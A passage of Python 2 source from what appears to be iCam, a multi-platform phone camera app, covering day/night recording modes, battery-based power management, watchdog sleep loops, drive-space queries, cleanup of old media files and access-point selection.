            "The only requirement for this is Python should be installed
            and the installed Python Scriptshell must be signed by the
            Dev cert with location capability."
            """
            if gsmLocation is None:
                # No fix from the API: reset to -1 only if we never had
                # a fix (cellId still None); otherwise keep the last
                # known values.
                if cellId is None:
                    mobileCountryCode = -1
                    mobileNetworkCode = -1
                    locationAreaCode = -1
                    cellId = -1
            else:
                (mobileCountryCode, mobileNetworkCode,
                    locationAreaCode, cellId) = gsmLocation
        except:
            DebugPrintErrorTrace()
    elif SYMBIAN_UIQ_OS:
        mobileCountryCode = -1
        mobileNetworkCode = -1
        locationAreaCode = -1
        cellId = -1
    elif ANDROID_OS:
        # lac/cid come from the SL4A cell-location dict; country and
        # network codes are not provided there.
        cellInfo = myDroid.getCellLocation()
        mobileCountryCode = -1
        mobileNetworkCode = -1
        try:
            locationAreaCode = int(cellInfo.result["lac"])
        except:
            locationAreaCode = -1
        try:
            cellId = int(cellInfo.result["cid"])
        except:
            cellId = -1
    elif iOS_PYOBJC:
        # print "myDroid.readPhoneState() =", myDroid.readPhoneState()
        # print "myDroid.readLocation() =", myDroid.readLocation()
        # "Requires API Level 7." (v 2.1)
        #print "myDroid.readSignalStrengths() =", myDroid.readSignalStrengths()
        mobileCountryCode = -1
        mobileNetworkCode = -1
        locationAreaCode = -1
        cellId = -1
    elif WINDOWS_OS:
        mobileCountryCode = -1
        mobileNetworkCode = -1
        locationAreaCode = -1
        cellId = -1
    elif WINDOWS_CE_OS_PYTHONCE:
        mobileCountryCode = -1
        mobileNetworkCode = -1
        locationAreaCode = -1
        cellId = -1
def CompareTimesOfDay(timeOfDay1, timeOfDay2):
    """
    Lexicographically compare two times of day.

    Each argument is a sequence (hour, minute, second, ...); only the
    first three fields participate in the comparison.

    Returns True if timeOfDay1 > timeOfDay2, False otherwise.
    Bug fix: the original fell through and implicitly returned None
    when the two times were equal; we now return an explicit False.
    This is backward-compatible since None is falsy.
    """
    # Tuple comparison is already lexicographic, field by field.
    return tuple(timeOfDay1[:3]) > tuple(timeOfDay2[:3])
    # Maybe use numMilliseconds, as well.
# Day-mode window used by ModeManager() below: day mode runs from
# dawnTimeVec to duskTimeVec (inclusive), night mode otherwise.
# Nokia 6680
if deviceId == IMEI_6680:
    # On the 6680 the day-mode window is restricted to 07:00:00-15:59:59.
    dawnTimeVec = [7, 0, 0]
    duskTimeVec = [15, 59, 59]
else:
    # All other devices: day mode spans the whole day.
    # dawnTimeVec = [7, 0, 0]
    dawnTimeVec = [0, 0, 0]
    # duskTimeVec = [15, 59, 59]
    duskTimeVec = [23, 59, 59]
#!!!!TODO: adapt to the current cameraMode, etc and uncomment in ReactiveLoop_real()
def ModeManager():
    """
    Switch the recording mode according to the time of day.

    Inside the [dawnTimeVec, duskTimeVec] window the app takes photos
    (SetRecordDuration(0, 0)); outside it, it records 15-unit video
    clips (SetRecordDuration(0, 15)).  SetRecordDuration persists state
    to drive, so it is only called when the mode actually changes.
    All errors are swallowed via DebugPrintErrorTrace().
    """
    global videoRecordDuration
    global dawnTimeVec, duskTimeVec
    try:
        now = GetCurrentDateTime()
        nowVec = [now.tm_hour, now.tm_min, now.tm_sec]
        isDayMode = CompareTimesOfDay(nowVec, dawnTimeVec) and \
                    CompareTimesOfDay(duskTimeVec, nowVec)
        if isDayMode:
            DebugPrint("ModeManager(): Day mode - calling "
                       "SetRecordDuration(0, 0) --> take photos.")
            # Skip the call if we are already in photo mode.
            if videoRecordDuration[0] != 0:
                SetRecordDuration(0, 0)
        else:
            DebugPrint("ModeManager(): Night mode - calling "
                       "SetRecordDuration(0, 15) --> record video.")
            # Skip the call if we are already in video mode.
            if videoRecordDuration[0] == 0:
                SetRecordDuration(0, 15)
    except:
        DebugPrintErrorTrace()
"""
http://discussion.forum.nokia.com/forum/showthread.php?p=743894#post743894
and http://snippets.dzone.com/posts/show/831
See also
http://discussion.forum.nokia.com/forum/showthread.php?202489-e32.Ao_timer%28%29.after%28...%29-crashes-for-more-than-30-minutes
"""
#!!!!TODO: take out if not being used
def LongAfter(aTimer, duration, callback):
    """
    Sleep on aTimer for an arbitrarily long duration (seconds).

    Symbian's CTimer::After() takes a signed 32-bit microsecond count,
    so a single after() can wait at most ~2147 seconds.  We therefore
    issue repeated after() calls of at most 2100 seconds each; only the
    final slice is scheduled with the callback attached.
    """
    chunk = 2100  # seconds; safely below the ~2147 s CTimer::After() limit
    remaining = duration
    while remaining > chunk:
        # Intermediate slices get no callback.
        aTimer.after(chunk)
        remaining -= chunk
    if remaining > 0:
        aTimer.after(remaining, callback)
# Maximum interval, in seconds, between two consecutive watchdog
# "pettings" in SleepAndPetWatchdog().
# NOTE(review): both branches assign the same value, so the iOS
# distinction is currently vestigial.
if iOS_PYOBJC:
    MAX_DURATION_BETWEEN_PETTING = 30 # seconds
else:
    MAX_DURATION_BETWEEN_PETTING = 30 #seconds
#MAX_DURATION_BETWEEN_PETTING = 1 # seconds
# Active-object timer shared by SleepAndPetWatchdog() below; created
# once at import time on Symbian only.
if SYMBIAN_OS:
    # BEFORE_MAIN!!
    # if SYMBIAN_OS and SYMBIAN_S60_OS:
    sleepAndPetWatchdogTimer = e32.Ao_timer()
"""
!!!!TODO: PowerManager should return:
return pauseIntervalPowerManaged, conserveEnergy, changedConserveEnergy
since conserveEnergy, changedConserveEnergy are not part of state anyhow
"""
def PowerManager():
    """
    Decide whether to conserve energy and compute the pause interval.

    Reads the battery level and charger status, sets the globals
    conserveEnergy and changedConserveEnergy, and returns the pause
    interval to use (PAUSE_INTERVAL_POWER_MANAGED when conserving,
    otherwise the configured pauseInterval).

    NOTE(review): on any exception the handler only logs the trace, so
    the function implicitly returns None -- callers assigning
    duration = PowerManager() should be aware of this.
    """
    global pauseInterval
    global conserveEnergy, changedConserveEnergy
    global uploadUnsentData
    # Remember previous state so we can report transitions below.
    conserveEnergyOld = conserveEnergy
    """
    EChargingStatusError = -1,
    /// Charger not connected/uninitialized
    EChargingStatusNotConnected = 0,
    /// Device is charging
    EChargingStatusCharging = 1,
    /// Charger is connected, device not charging
    EChargingStatusNotCharging = 2,
    /// Charging almost completed
    EChargingStatusAlmostComplete = 3,
    /// Charging completed
    EChargingStatusChargingComplete = 4,
    /// Charging continued after brief interruption
    EChargingStatusChargingContinued = 5
    if GetChargerStatus() == 0:
        #Conserve energy
    elif GetChargerStatus() == 1,5:
        #Conserve energy somewhat.
    elif GetChargerStatus() == 2:
        #Go for maximum performance.
    elif GetChargerStatus() == 3, 4:
        pass
    """
    try:
        crtGetBatteryLevelPercentage = float(GetBatteryLevelPercentage())
        crtGetChargerStatus = GetChargerStatus()
        pauseIntervalPowerManaged = pauseInterval
        """
        # Power manage the cellphone - attempt to avoid running out of power.
        #if (crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD( or
        #    (crtGetChargerStatus == 0):
        #if crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD:
        """
        if deviceId == IMEI_E7:
            # For Nokia E7 we power manage even without the charger on.
            if crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD:
                conserveEnergy = True
            else:
                conserveEnergy = False
        else:
            """
            # VERY CONSERVATIVE POLICY - gets in standby immediately when
            # charger gets disconnected.
            if crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD:
                conserveEnergy = True
            elif crtGetChargerStatus == 0:
                conserveEnergy = True
            """
            # Conserve when the battery is below half the threshold, or
            # below the full threshold with no charger connected.
            if crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD / 2:
                conserveEnergy = True
            elif (crtGetChargerStatus == 0) and \
                (crtGetBatteryLevelPercentage <= BATTERY_LEVEL_THRESHOLD):
                conserveEnergy = True
            else:
                conserveEnergy = False
        if conserveEnergy == conserveEnergyOld:
            changedConserveEnergy = False
        else:
            changedConserveEnergy = True
        """
        # Nokia 6120 and 6680 and N95
        #if (deviceId == IMEI_6120) or (deviceId == IMEI_6680) or
        #    (deviceId == IMEI_N95):
        # Nokia 6120 and 6680 and N95 and N82
        #if deviceId in [IMEI_6120, IMEI_6680, IMEI_N95, IMEI_N82]:
        # Nokia 6120 and 6680 and N95 and N82
        #if deviceId in [IMEI_E7, IMEI_6120, IMEI_6680, IMEI_N95, IMEI_N82]:
        """
        if conserveEnergy == True:
            """
            if True:
                !!!!Treat the else case for this if
            """
            """
            if GetBatteryLevelPercentage() <= 50.0:
                pauseInterval = 30 * 60 #30 min
            else:
            """
            # Stretch the duty cycle while conserving energy.
            pauseIntervalPowerManaged = PAUSE_INTERVAL_POWER_MANAGED
            #conserveEnergy = True
            #uploadUnsentData = 0
        if MY_DEBUG_STDOUT:
            print "PowerManager(): crtGetBatteryLevelPercentage = %f, " \
                "crtGetChargerStatus = %d --> adjusting " \
                "pauseIntervalPowerManaged = %d." % \
                (crtGetBatteryLevelPercentage,
                crtGetChargerStatus,
                pauseIntervalPowerManaged)
            # NOTE(review): flushing only when NOT conserving energy --
            # presumably to avoid extra work in conserve mode; confirm.
            if conserveEnergy == False:
                sys.stdout.flush()
        return pauseIntervalPowerManaged
    except:
        DebugPrintErrorTrace()
"""
SleepAndPetWatchdog(duration) changes the duty-cycle of the app
    (PowerManager() determines it), we make this simple implementation:
- pauseInterval always remains the configured value (e.g., 240 secs)
- we have duration = PowerManager() to adjust the duration (e.g, make
it 10 hours if PowerManager() considers we need to conserve energy
since we are low on battery energy)
- we need to pet every MAX_DURATION_BETWEEN_PETTING.
So we have a loop
while duration > 0:
...
duration -= MAX_DURATION_BETWEEN_PETTING
...
# We check if power came back after a power down in order to get out of (a big) sleep.
if powerManage:
PowerManager()
...
"""
def SleepAndPetWatchdog(duration, powerManage=False):
    """
    Sleep for `duration` seconds while regularly "petting" the watchdog.

    The sleep is broken into slices of at most
    MAX_DURATION_BETWEEN_PETTING seconds; after each slice PetWatchdog()
    is called.  When powerManage is True, ModeManager()/PowerManager()
    are consulted: the effective duration comes from PowerManager(), and
    the sleep is aborted early (return) if power comes back while
    conserving energy.  On the N82 a BT command adjusting the 6680's
    pause interval is sent on conserve-energy transitions.
    """
    global sleepAndPetWatchdogTimer, pauseInterval
    global MAX_DURATION_BETWEEN_PETTING
    global modeManagerIsEnabled
    global sentBTMessageTo6680
    DebugPrint("SleepAndPetWatchdog(): Entered SleepAndPetWatchdog().")
    # duration = pauseInterval
    """
    """
    if SYMBIAN_OS:
        try:
            """
            One needs to give at least before the first after() a cancel,
            otherwise will receive "RuntimeError: Timer pending - cancel
            first"
            """
            sleepAndPetWatchdogTimer.cancel()
        except:
            DebugPrintErrorTrace()
    if powerManage:
        if modeManagerIsEnabled:
            ModeManager()
        """
        This basically makes duration = pauseInterval (or 10 hours if the
        charger is not charging).
        """
        duration = PowerManager()
        if deviceId == IMEI_N82:
            if (changedConserveEnergy == True) and (conserveEnergy == True) and \
                (sentBTMessageTo6680 == 0):
                # We just changed to conserveEnergy == True state
                ExecuteCommands("send-command-via-bluetooth " + BT_ADDR_6680 + \
                    " set-pause-interval %d" % \
                    PAUSE_INTERVAL_POWER_MANAGED)
                """
                To avoid losing the fact iCam sent the above BT command, if it
                crashes, then we store in sentBTMessageTo6680 the fact it
                sent (or not) this message. We can then use this info when
                iCam restarts, if necessary.
                """
                sentBTMessageTo6680 = 1
                StoreState()
    try:
        while duration > 0:
            if duration > MAX_DURATION_BETWEEN_PETTING:
                # Full slice: sleep MAX_DURATION_BETWEEN_PETTING, then pet.
                if SYMBIAN_OS:
                    sleepAndPetWatchdogTimer.after(MAX_DURATION_BETWEEN_PETTING)
                elif ANDROID_OS or RASPBIAN_OS:
                    DebugPrint("SleepAndPetWatchdog(): " \
                        "MAX_DURATION_BETWEEN_PETTING = %d." % \
                        MAX_DURATION_BETWEEN_PETTING)
                    time.sleep(MAX_DURATION_BETWEEN_PETTING)
                elif iOS_PYOBJC:
                    DebugPrint("SleepAndPetWatchdog(): Before time.sleep() " \
                        "of MAX_DURATION_BETWEEN_PETTING = %d." % \
                        MAX_DURATION_BETWEEN_PETTING)
                    """
                    It crashes app when MAX_DURATION_BETWEEN_PETTING = 30,
                    around the middle, I guess.
                    """
                    time.sleep(MAX_DURATION_BETWEEN_PETTING)
                    # time.sleep(1)
                    DebugPrint("SleepAndPetWatchdog(): finished time.sleep().")
                elif WINDOWS_CE_OS_PYTHONCE:
                    DebugPrint("SleepAndPetWatchdog(): " \
                        "MAX_DURATION_BETWEEN_PETTING = %d." % \
                        MAX_DURATION_BETWEEN_PETTING)
                    time.sleep(MAX_DURATION_BETWEEN_PETTING)
                #e32.ao_sleep(MAX_DURATION_BETWEEN_PETTING)
                duration -= MAX_DURATION_BETWEEN_PETTING
                pauseIntervalOld = pauseInterval # !!!! NOT USED
                PetWatchdog()
                if powerManage:
                    """
                    In case the charger is powered after being stopped and we made
                    duration very big (to sleep a lot), we stop sleeping.
                    Also, this helps in case we change from (very) big pauseInterval
                    to a smaller pauseInterval by stopping the sleep.
                    THIS DOESN'T WORK VERY WELL IF pauseInterval is big (e.g., 1
                    hour, etc), BUT IT'S NOT A SERIOUS FLAW.
                    """
                    #if duration > PowerManager():
                    #    return
                    #
                    # We check if power came back after a power down in order to get out of sleep.
                    PowerManager()
                    if (changedConserveEnergy == True) and (conserveEnergy == False):
                        # We just changed back to having/receiving energy
                        if deviceId == IMEI_N82:
                            if sentBTMessageTo6680 == 1:
                                """
                                Note that it is possible that iCam is stopped
                                when power comes back and we miss this event -
                                that is why we save as part of state
                                sentBTMessageTo6680 (we could also rely on the
                                iCam server, that better checks the state of
                                the phones in the "LAN") in order to check and
                                act, if necessary, also when iCam starts.
                                !!!!This is not great since 6680 might have a
                                different pauseInterval than 240 - create
                                special iCam command:
                                information-a-different-phone-charger-down
                                """
                                ExecuteCommands("send-command-via-bluetooth " + \
                                    BT_ADDR_6680 + " set-pause-interval 240")
                                sentBTMessageTo6680 = 0
                                StoreState()
                        return
                """
                #In case the PowerManager decides to make pauseInterval shorter.
                if pauseInterval < pauseIntervalOld:
                    return
                """
                #if durationOriginal - \
                #    duration % MAX_DURATION_BETWEEN_PETTING == pauseInterval
                """
                For BT client devices we should receive only BT messages with
                commands (CMD), so this should take very little time.
                This ensures fast responsiveness also when iCam is in
                ~standby mode (pauseInterval is 10 hrs or more)
                """
                if bluetoothMode == 2:
                    BluetoothMessageListProcess(processJustNonSMF_BtMsgs=True)
            else:
                # Final (partial) slice: sleep the remainder, then pet.
                if SYMBIAN_OS:
                    sleepAndPetWatchdogTimer.after(duration)
                elif ANDROID_OS or RASPBIAN_OS:
                    DebugPrint("SleepAndPetWatchdog(): duration = %d." % \
                        duration)
                    time.sleep(duration)
                elif WINDOWS_CE_OS_PYTHONCE:
                    DebugPrint("SleepAndPetWatchdog(): duration = %d." % \
                        duration)
                    time.sleep(duration)
                # e32.ao_sleep(duration)
                duration = 0
                PetWatchdog()
    except:
        DebugPrintErrorTrace()
# Returns the amount of free RAM in bytes.
def GetFreeRAM():
    """
    Return the amount of free RAM, in bytes.

    Only Symbian S60 reports a real value (sysinfo.free_ram()); every
    other supported platform returns the placeholder 123456789.
    Implicitly returns None if no platform flag is set.
    """
    if SYMBIAN_S60_OS:
        return sysinfo.free_ram()
    # Same placeholder on all remaining platforms; the flag order
    # mirrors the original elif chain.
    for platformFlag in (SYMBIAN_UIQ_OS, ANDROID_OS, iOS_PYOBJC,
                         WINDOWS_CE_OS_PYTHONCE, WINDOWS_OS, UNIX_OS,
                         RASPBIAN_OS):
        if platformFlag:
            return 123456789
# Returns the free space in bytes on the drive aDriveStr.
def GetFreeDriveSpace(aDriveStr):
    """
    Return the free space, in bytes, on drive aDriveStr.

    Returns -1 on any error or on platforms where the query is not
    implemented.  On Unix/Raspbian aDriveStr is ignored and the root
    filesystem is queried.  On S60 the value may arrive as a single int
    or, from a patched sysinfo module, as a pair of 32-bit ints that
    are reassembled into a 64-bit value via struct pack/unpack.
    """
    try:
        # if SYMBIAN_OS:
        if SYMBIAN_S60_OS:
            """
            We treat sysinfo.free_drivespace() returning int (on PyS60 1.4.5,
            normally on S60 2nd edition) or pair of ints (for PyS60 2.0).
            """
            try:
                dictDrives = sysinfo.free_drivespace()
                if isinstance(dictDrives[unicode(aDriveStr)], int):
                    return dictDrives[unicode(aDriveStr)]
                elif isinstance(dictDrives[unicode(aDriveStr)], tuple):
                    """
                    This is for our altered sysinfo module that returns 2 ints
                    instead of 1, since freeSpace is 64 bits and we can have
                    drives with more than 2GB.
                    """
                    """
                    DebugPrint("GetFreeDriveSpace(aDriveStr = %s): " \
                        "(0 = %d, 1 = %d)." % (aDriveStr,
                        dictDrives[unicode(aDriveStr)][0],
                        dictDrives[unicode(aDriveStr)][1]))
                    """
                    #return dictDrives[unicode(aDriveStr)][1] +
                    #    (dictDrives[unicode(aDriveStr)][0] << 32)
                    #return dictDrives[unicode(aDriveStr)][1] |
                    #    (dictDrives[unicode(aDriveStr)][0] << 32)
                    # """
                    """
                    IMPORTANT: We require < to specify little endian and ALSO
                    no alignment (see http://docs.python.org/library/struct.html)
                    """
                    # Low word first, then high word -> one signed 64-bit int.
                    strPack = struct.pack("<ii",
                        dictDrives[unicode(aDriveStr)][1],
                        dictDrives[unicode(aDriveStr)][0])
                    """
                    IMPORTANT: We require < to specify little endian and ALSO
                    no alignment (see http://docs.python.org/library/struct.html)
                    """
                    (myVal, ) = struct.unpack("<q", strPack)
                    return myVal
                else:
                    # """
                    return -1
            except:
                #DebugPrintErrorTrace()
                return -1
        elif SYMBIAN_UIQ_OS:
            return -1
        elif ANDROID_OS:
            """
            DOESN'T WORK: return os.statvfs(aDriveStr).f_bfree
            #AttributeError: 'module' object has no attribute 'statvfs'
            """
            """
            From http://stackoverflow.com/questions/787776/find-free-disk-space-in-python-on-os-x
            (see also http://ubuntuforums.org/showthread.php?t=961505):
            """
            # s = os.statvfs('/')
            # print (s.f_bavail * s.f_frsize) / 1024
            """
            !!!!TODO: try it out
            from jnius import autoclass # move in front
            StatFs = autoclass("android.os.StatFs")
            stats = StatFs(aDriveStr)
            availableBlocks = stats.getAvailableBlocks()
            blockSizeInBytes = stats.getBlockSize()
            freeSpaceInBytes = availableBlocks * blockSizeInBytes
            """
            return -1
        elif WINDOWS_CE_OS_PYTHONCE:
            """
            # Seems not to work on WinCE
            # From http://stackoverflow.com/questions/51658/cross-platform-space-remaining-on-volume-using-python
            # (see also http://stackoverflow.com/questions/2973480/available-disk-space-on-an-smb-share-via-python
            # and http://bytes.com/topic/python/answers/609682-how-check-remaining-hard-drive-space-windows)
            try:
                LOCAL_DRIVE_AUX = "\\Storage Card"
                freeDriveSpace = ctypes.c_ulonglong(0)
                #ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(LOCAL_DRIVE),
                #    None, None, ctypes.pointer(freeDriveSpace))
                ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(LOCAL_DRIVE_AUX),
                    None, None, ctypes.pointer(freeDriveSpace))
                return freeDriveSpace.value
            except:
                DebugPrintErrorTrace()
                return -1
            """
            return -1
        elif iOS_PYOBJC:
            return -1
        elif WINDOWS_OS:
            # From http://stackoverflow.com/questions/51658/cross-platform-space-remaining-on-volume-using-python
            free_bytes = ctypes.c_ulonglong(0)
            ctypes.windll.kernel32.GetDiskFreeSpaceExW(
                ctypes.c_wchar_p(aDriveStr),
                None, None, ctypes.pointer(free_bytes))
            DebugPrint("GetFreeDriveSpace(): free_bytes.value = %d." % \
                free_bytes.value)
            return free_bytes.value
            # return -1
        elif UNIX_OS or RASPBIAN_OS:
            """
            Note: for Unix aDriveStr doesn't really matter,
            so it can be a "bogus" value
            # UNIX (they say MacOS also):
            # From http://stackoverflow.com/questions/787776/find-free-disk-space-in-python-on-os-x
            # (see also http://ubuntuforums.org/showthread.php?t=961505):
            """
            s = os.statvfs("/")
            # print (s.f_bavail * s.f_frsize) / 1024
            res = s.f_bavail * s.f_frsize
            DebugPrint("GetFreeDriveSpace(aDriveStr=%s): returning %d." % \
                (aDriveStr, res))
            return res
    except:
        DebugPrintErrorTrace()
        return -1
# Putting a "quota" on free space
# EraseOldestFilesFromFolder() stops deleting once at least this much
# free space (100 MB, in bytes) is available on the drive.
AT_LEAST_FREE_DRIVESPACE_TO_STOP = 100 * 1024 * 1024
def EraseOldestFilesFromFolder(aFolder, atLeastFreeDrivespaceToStop):
    """
    Delete the oldest files from aFolder (names sorted ascending, which
    for this app's timestamped filenames means oldest first) until the
    drive has at least atLeastFreeDrivespaceToStop free bytes.

    NOTE(review): the os.unlink() call is inside a string literal, i.e.
    deletion is currently DISABLED -- the function only logs which
    files it would delete.  Presumably disabled on purpose (see the
    TODO about moving files instead); confirm before re-enabling.
    """
    # Fast exit if the drive (aFolder[:2], e.g. "E:") already has room.
    if GetFreeDriveSpace(aFolder[:2]) >= atLeastFreeDrivespaceToStop:
        return
    try:
        DebugPrint("EraseOldestFilesFromFolder(): aFolder = %s." % aFolder)
        mediaFolderContent = os.listdir(aFolder)
        # sortedMediaFolderContent = sorted(mediaFolderContent)
        """
        sort() without parameters is the ONLY one that works in Python 2.2.
        (Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
        """
        mediaFolderContent.sort()
        sortedMediaFolderContent = mediaFolderContent
        # print "sortedMediaFolderContent =", sortedMediaFolderContent
        for mediaFileName in sortedMediaFolderContent:
            pathFileName = aFolder + "/" + mediaFileName
            if os.path.isfile(pathFileName):
                try:
                    """
                    os.unlink(pathFileName)
                    #TODO!!!! maybe use MoveFileBetweenAnyDrives(srcPathFileName, dstPathFileName)
                    """
                    DebugPrint("EraseOldestFilesFromFolder(): deleting file %s." % \
                        pathFileName)
                    # Stop as soon as enough space has been freed.
                    if GetFreeDriveSpace(aFolder[:2]) >= \
                        atLeastFreeDrivespaceToStop:
                        return
                except:
                    DebugPrintErrorTrace()
    except:
        DebugPrintErrorTrace()
def EraseOldestFilesFromFolderWithFileCountQuota(aFolder, filterString,
                                                 fileCountQuota):
    """
    Delete the oldest files in aFolder whose names start with
    filterString, until at most fileCountQuota entries remain.

    NOTE(review): the os.unlink() is commented out inside a string
    literal, so deletion is currently DISABLED -- the function only
    logs.  Also, the in-loop quota check re-tests the unmodified
    mediaFolderContent list, so with deletion enabled it would still
    never become true; it only works if deletions update the list.
    """
    try:
        DebugPrint("EraseOldestFilesFromFolderWithFileCountQuota(): " \
            "aFolder = %s." % aFolder)
        mediaFolderContent = os.listdir(aFolder)
        #print "mediaFolderContent =", mediaFolderContent
        # Under quota already: nothing to do.
        if len(mediaFolderContent) <= fileCountQuota:
            return
        """
        # Cannot do in-place the removal since it upsets the iterator
        for fileName in mediaFolderContent:
            #print "fileName =", fileName
            if not fileName.startswith("stdout_"):
                print "Removing %s." % fileName
                #mediaFolderContent.remove(fileName)
                #mediaFolderContent.__delitem__(
        """
        mediaFolderContentFiltered = []
        for fileName in mediaFolderContent:
            if fileName.startswith(filterString):
                mediaFolderContentFiltered.append(fileName)
        #print "mediaFolderContentFiltered =", mediaFolderContentFiltered
        #sortedMediaFolderContent = sorted(mediaFolderContent)
        """
        sort() without parameters is the ONLY one that works in Python 2.2.
        (Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
        """
        mediaFolderContentFiltered.sort()
        sortedMediaFolderContent = mediaFolderContentFiltered
        #print "sortedMediaFolderContent =", sortedMediaFolderContent
        for mediaFileName in sortedMediaFolderContent:
            pathFileName = aFolder + "/" + mediaFileName
            if os.path.isfile(pathFileName):
                try:
                    """
                    #os.unlink(pathFileName)
                    #TODO!!!! maybe use MoveFileBetweenAnyDrives(srcPathFileName, dstPathFileName)
                    """
                    DebugPrint("EraseOldestFilesFromFolderWithFileCountQuota(): " \
                        "deleting file %s." % pathFileName)
                    if len(mediaFolderContent) <= fileCountQuota:
                        return
                except:
                    DebugPrintErrorTrace()
    except:
        DebugPrintErrorTrace()
def EraseOldestFilesAndMessages():
    """
    Free drive space by trimming oldest files from the media folder and
    then the unsent-files folder, each down to the global free-space
    quota AT_LEAST_FREE_DRIVESPACE_TO_STOP.
    """
    DebugPrint("Entered EraseOldestFilesAndMessages().")
    # Media first, then unsent - same order as before.
    for targetFolder in (LOCAL_FOLDER_MEDIA_FILES, LOCAL_FOLDER_UNSENT_FILES):
        EraseOldestFilesFromFolder(targetFolder,
                                   AT_LEAST_FREE_DRIVESPACE_TO_STOP)
    # TODO: Maybe erase BT messages older than 1 day
def DisplayDeviceId(*args):
    """
    Pop up a note showing the device ID (IMEI) to the user.

    On S60 this uses globalui.global_note (which shows a progress bar
    and a Cancel button instead of OK); on Android it goes through
    DisplayNote().  Extra positional args (e.g. from a menu callback)
    are ignored.
    """
    global deviceId
    DebugPrint("Entered DisplayDeviceId().")
    message = "Your device ID (IMEI): " + deviceId + "."
    if SYMBIAN_S60_OS:
        # From http://wiki.forum.nokia.com/index.php/Python_on_Symbian/04._Basic_User_Interface.
        globalui.global_note(unicode(message), "wait")
    elif ANDROID_OS:
        DisplayNote(message)
def SelectAccessPointIfNoneAvailableAndConnectToIt():
    """
    Ensure a network access point is selected and set as default.

    On S60: if accessPointName is empty, pop up the AP selection dialog
    (Cancel => Offline mode, accessPointName stays empty); otherwise
    resolve the stored name to an iapid (pre-1.9 PyS60 only) and set it
    as the default access point.  State is persisted via StoreState().
    On every other platform a placeholder name is assigned and
    accessPointRetryConnect is cleared.

    accessPointRetryConnect is set True when connecting fails (S60
    except branch), which triggers a later retry.
    """
    global accessPointName, accessPointRetryConnect
    # if SYMBIAN_OS:
    if SYMBIAN_S60_OS:
        try:
            """
            From http://discussion.forum.nokia.com/forum/showthread.php?t=97881
            (Thread: avoid "select access point " dialog)
            """
            # It seems it crashes here if accessPointName = "" (??)
            accessPointList = socket.access_points()
            if MY_DEBUG_STDOUT:
                print "SelectAccessPointIfNoneAvailableAndConnectToIt(): " \
                    "The list of Access Points is:"
                for accessPoint in accessPointList:
                    print "iapid = %d name = %s" % (accessPoint["iapid"],
                        accessPoint["name"])
                sys.stdout.flush()
            if accessPointName == u"":
                # No AP chosen yet: ask the user interactively.
                global doNotDisplayRedrawInfo
                doNotDisplayRedrawInfo = True
                try:
                    if _PyS60_1_9_OR_NEWER:
                        iapidSelected = btsocket.select_access_point()
                    else:
                        iapidSelected = socket.select_access_point()
                except:
                    # apo = socket.access_point(iapidSelected)
                    # socket.set_default_access_point(apo)
                    doNotDisplayRedrawInfo = False
                    DebugPrintErrorTrace()
                doNotDisplayRedrawInfo = False
                # Map the selected iapid back to its index in the list.
                index = 0
                for accessPoint in accessPointList:
                    if accessPoint["iapid"] == iapidSelected:
                        break
                    else:
                        index += 1
                if (index < 0) or (index >= len(accessPointList)):
                    # Dialog cancelled (or iapid not found): Offline mode.
                    DebugPrint("SelectAccessPointIfNoneAvailableAndConnectToIt():" \
                        " Manually selected to be in Offline mode.")
                    accessPointName = u""
                    StoreState()
                    return
                accessPointName = accessPointList[index]["name"]
                DebugPrint("SelectAccessPointIfNoneAvailableAndConnectToIt(): "\
                    "Manually selected Acces Point with iapid = %d " \
                    "and name = %s." % (iapidSelected, accessPointName))
                """
                DebugPrint("Manually selected Acces Point iapidSelected = %s,"\
                    " apo = %s with name = %s." % (iapidSelected, apo,
                    accessPointList[iapidSelected]["name"]) #, apo["name"]
                """
            else:
                # AP name already stored; pre-1.9 PyS60 needs its iapid.
                if not _PyS60_1_9_OR_NEWER:
                    iapidSelected = -1
                    for accessPoint in accessPointList:
                        if accessPoint["name"] == accessPointName:
                            iapidSelected = accessPoint["iapid"]
                            break
                    if iapidSelected == -1:
                        DebugPrint("SelectAccessPointIfNoneAvailableAndConnectToIt(): "\
                            "Was not able to find AP selected earlier in " \
                            "current list of APs. " \
                            "Going in Offline mode.")
                        accessPointName = u""
                        StoreState()
                        return
                    DebugPrint("SelectAccessPointIfNoneAvailableAndConnectToIt():"\
                        " Selected Acces Point with iapid = %d and " \
                        "name = %s." % (iapidSelected, accessPointName))
            e32.ao_yield()
            myText = "SelectAccessPointIfNoneAvailableAndConnectToIt(): " \
                "Connecting to the Access Point %s." % accessPointName
            DebugPrint(myText)
            if MY_DEBUG_STDERR:
                sys.stderr.write(myText + "\n")
                sys.stderr.flush()
            # appuifw.note(unicode(myText), "info")
            if _PyS60_1_9_OR_NEWER:
                # Code working on PyS60 1.9, but not on 1.4.5
                """
                Strange: it seems we need to use the set_default_access_point
                from socket and not btsocket on PyS60 1.9+
                """
                socket.set_default_access_point(accessPointName)
            else:
                # socket.set_default_access_point(accessPointList[index])
                # Code working on PyS60 1.4.5, but not on 1.9+
                # apo = socket.access_point(accessPoint["iapid"])
                apo = socket.access_point(iapidSelected)
                socket.set_default_access_point(apo)
            accessPointRetryConnect = False
            # SetMenu() #!!!!I should uncomment this.
            StoreState()
            """
            for accessPoint in accessPointList:
                #print "iapid = %d name = %s" % (accessPoint["iapid"],
                #    accessPoint["name"])
                #print "name = %s" % access_point["name"]
                if accessPoint["name"] == u"RDS":
                #if (accessPoint["name"] == u"VF Internet pe Mobil") or
                #    (accessPoint["name"] == u"Vodafone live! PRE"):
                #if accessPoint["name"] == u"Titan":
                # I was not able to use webnwalk to upload (and most likely not
                # able to download either) data to the web.
                #if accessPoint["name"] == u"webnwalk":
                    #socket.set_default_access_point(access_point["iapid"])
                    print "Selecting Acces Point", accessPoint["name"]
                    if _PyS60_1_9_OR_NEWER:
                        #Code working on PyS60 1.9+, but not on 1.4.5
                        socket.set_default_access_point(accessPoint["name"])
                    else:
                        #Code working on PyS60 1.4.5, but not on 2.0.0
                        apo = socket.access_point(accessPoint["iapid"])
                        socket.set_default_access_point(apo) #accessPoint)
                    #btsocket.access_point(accessPoint["iapid"])
                    #apo = btsocket.access_point(accessPoint["iapid"])
